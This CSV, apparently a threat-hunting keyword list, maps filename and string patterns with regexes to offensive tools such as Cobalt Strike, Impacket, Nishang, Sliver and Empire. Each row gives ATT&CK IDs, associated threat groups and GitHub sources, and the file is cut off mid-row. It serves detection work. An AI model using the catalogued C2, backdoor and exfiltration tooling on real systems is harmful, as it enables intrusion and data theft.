"*http_stager_server_append*",".{0,1000}http_stager_server_append.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","47552"
"*http_stager_server_header*",".{0,1000}http_stager_server_header.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","47553"
"*http_stager_server_prepend*",".{0,1000}http_stager_server_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","47554"
"*http_stager_uri_x64*",".{0,1000}http_stager_uri_x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","47555"
"*http_stager_uri_x86*",".{0,1000}http_stager_uri_x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","47556"
"*http1.x64.bin*",".{0,1000}http1\.x64\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","47557"
"*http1.x64.dll*",".{0,1000}http1\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","47558"
"*HTTPAES256Handler.*",".{0,1000}HTTPAES256Handler\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","47559"
"*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","47560"
"*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","47561"
"*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 -  T1101 -  T1201 -  T1570","TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","47562"
"*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","47563"
"*httpattacks/*.py*",".{0,1000}httpattacks\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","47564"
"*HTTP-Backdoor.ps1*",".{0,1000}HTTP\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","47565"
"*HTTP-Backdoor.ps1*",".{0,1000}HTTP\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","47566"
"*HTTP-Backdoor.ps1*",".{0,1000}HTTP\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","47567"
"*httpbrute.py*",".{0,1000}httpbrute\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","47568"
"*http-c2_test.go*",".{0,1000}http\-c2_test\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","47569"
"*HTTPClient.post('https://httpbin.org/post*",".{0,1000}HTTPClient\.post\(\'https\:\/\/httpbin\.org\/post.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","47570"
"*httpClient.PostAsync(""https://file.io/*",".{0,1000}httpClient\.PostAsync\(\""https\:\/\/file\.io\/.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","47571"
"*HttpEvilClippyController*",".{0,1000}HttpEvilClippyController.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","47572"
"*HTTP-Login.ps1*",".{0,1000}HTTP\-Login\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","HTTP-Login.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","47573"
"*httpntlm.go*",".{0,1000}httpntlm\.go.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","47574"
"*httpntlm.old*",".{0,1000}httpntlm\.old.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","47575"
"*httppayload.bin*",".{0,1000}httppayload\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","N/A","10","10","362","58","2024-06-19T07:02:22Z","2021-02-08T10:52:39Z","47576"
"*HttpProxyScan_Log4J2.py*",".{0,1000}HttpProxyScan_Log4J2\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","47577"
"*http-redwarden*",".{0,1000}http\-redwarden.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 